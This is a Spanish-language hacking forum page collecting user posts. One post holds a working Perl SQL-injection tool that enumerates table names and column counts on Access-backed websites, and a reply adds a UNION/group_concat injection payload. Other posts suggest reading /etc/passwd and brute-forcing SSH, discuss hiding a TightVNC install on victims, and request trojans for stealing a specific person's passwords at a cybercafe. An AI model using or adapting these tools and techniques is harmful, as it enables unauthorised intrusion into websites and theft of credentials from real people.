Mensajes

Mm dudo q puedas realizar comandos ya que tiene desactivado ejecutar la variable system()..
Trata de leer el /etc/passwd y luego intenta brutear algun password de algun usuario..Todo esto si tiene el puerto 22 ssh abierto..
Saludos

[socket]

Hola estoy teniendo un problema en perl. Estoy haciendo script  y para practicar socket decidi hacer una tool que inyecte codigo SQL a un motor de ACCESS. Ahora la cuestion es que no se como hacer para que cuando realizo el SOCKET con una pagina "A" (la cual es la vulnerable a inyecciones), ese mismo socket me sirva para realizar todas las inyecciones que nesesite. Sin volver a crear el objeto nuevamente.  
Este es mi script. Si se fijan en cada inyeccion creo un nuevo socket llamando a la funcion socket,y le paso como parametro el GET de la pagina q deseo obtener (que vendria hacer la inyeccion q mando por URL)
Creo q esto esta mal.. alguien me podria ayudar..
Como seria crear una sola vez el Socket y luego usar Los GET que quisiera

Código (perl) [Seleccionar] Expandir

#!/usr/bin/perl
use IO::Socket;
@nombretabla=('admin','tblUsers','usuarios','tblAdmin','user','users','username','usernames','usuario',
 'name','names','nombre','nombres','member','members','admin_table',
 'miembro','miembros','membername','admins','administrator','accesos',
 'administrators','passwd','password','passwords','pass','Pass',
 'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
 'member_password','mods','mod','moderators','moderator','user_email',
 'user_emails','user_mail','user_mails','mail','emails','email','address',
 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
 'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
 'sistema_usuario','sistema_password','contraseña','auth','key','senha',
 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
     'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
     'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
     'associated','accnt','customers','customer','membres','administrateur','utilisateur',
     'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
     'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
 'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
sub socket{
   my $inyec= shift;
$socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
print $socket "GET " .$path.$inyec.$tabla. " HTTP/1.0\r\n";
print $socket "HOST:$host\r\n";
print $socket "\n\n";
return $socket;
 }

if (!@ARGV[1]) {
     print "======================================================= \n";
     print " Injection AIS V 1.0 beta by MagnoBalt \n\n";
     print " use perl $0 www.pagina.com.ar /noticia.php?id=\n\n";
 print " AIS:Acces Injection SQL \n";
     print "======================================================= \n";
     exit(0);
     }
$host =@ARGV[0];
$path=@ARGV[1];
print "\n[-]Buscando Tablas \n";
$iny="-1+UNION+SELECT+0+FROM+";
#print "antes de la funcion valor $iny\n";
foreach $tabla(@nombretabla) {
 chomp($tabla);  
 #empuezo a guardar linea por linea el source en $response
 $socket=&socket($iny);
 while (<$socket>) {$response .= "$_ "}
 if($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#243;n no coincide/)
{
print "[+]Tabla $tabla FOUND\n";
$tabla_aux=$tabla;
   }
#print $response;
$response="";#limpio la variable
}#cierrre foreach
$inyc="";
#buscamos numeros de columnas
print "[-]Buscando columnas\n";
print "[-]Ingrese Maximo con cual intentar \n";
$col.=<STDIN>;
chomp($col);
print "[-]Buscando..\n";
$columna=1;
while ($columna <= $col) {
$union.=','.$columna;
$iny="-1+UNION+SELECT+0".$union."+FROM+".$tabla_aux;
$socket=&socket($iny);
while (<$socket>) { $response .= "$_ "}
#print $response;
if ($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#243;n no coincide/)
{
print "[!] Fallo intento columna $columna\n";
}
else {
$columna++;
print "[+]La Web Posee $columna columnas\n ";
$columna = $col;#fuerzo la salida del while.
}
$response="";#limpio la variable
$columna++;
}



close $socket;
exit(0);





[fede_cp]

Hola como va fede_cp. La inyeccion con decimal esta mal.
1) El guion (-) en decimal es "45", no es es 0150 como pones vos.
2) Por que mejor no sacas todas las columnas de esa tabla con group_concat y listo.
ejemplo

-1 union all select 1,group_concat(column_name),1,2,5,6,8,9 from information_schema.columns where table_name = char(45,45,101,106,101,109,112,108,111)

eso te mostrara todas las columans de la tabla --ejemplo

Saludos. Espero te sirva

Escribiste demasiado!!! nadie lee tanto tenes q ser mas especifico!!

Muy bueno WHK.. Se agradece!!

[l0ve]

gracias l0ve, mas completo todavia..
Saludos Man..

[l0ve]

Hola l0ve Podes poner el Source del script vulnerable.
Seria de utilidad..
Gracias..

Interesante lo voy a probar..
Saludos!

[redxs]

Hola redxs esa clave que muestras esta mal el otro dia estyube observando unos cuantos errores en el tutorial poer no puedo modificarlo por cuestionmes de tiempo con la facultad.
El problema es que estuve observando y no arranca como servicio pero con esta opcion q trae el  Tightvnc WinVNC.exe" -install, el servicio queda instalado el problema es q le tira un hermoso cartel q te avisa..por lo tanto esa opcion no se como camuflarla despues voy a ver si logro..
Si alguien tiene alguna idea de como poder hacer que diga  asi vamos perfeccionando las cosas..Quizas compilarlo al codigo y sacarle ese cartel..
S2

bueno , es algo no tan dificil creo yo ,  La persona que me quiera ayudar , me manda el servidor de su troyano , , y yo lo ejecuto en las 20 PCs que tiene este cyber , (como todas las PCs tiene DeepFree, antes de ejecutar el servidor , rompere el Deepfree y una ves ejecutado el servidor , lo volvere a congelar , en las 20 PCs y asi el que me quiera ayudar se ganara " 20 victimas "  ) y bueno solo es cosa de esperar que ese man entre al cyber , como siempre lo hace (a diario) , y una ves que se conecte , Uds ,me mandan los Ids y las passwors que ah de escribir y eso es todo 


Os pido su ayudar , por que como ya sabran , desde un cyber no puedo hacer absolutamente nada

Que lindo para tu mesa de luz este personaje...Anda a leer mejorr..


PD:Sorry pero me molesto mucho esa actitud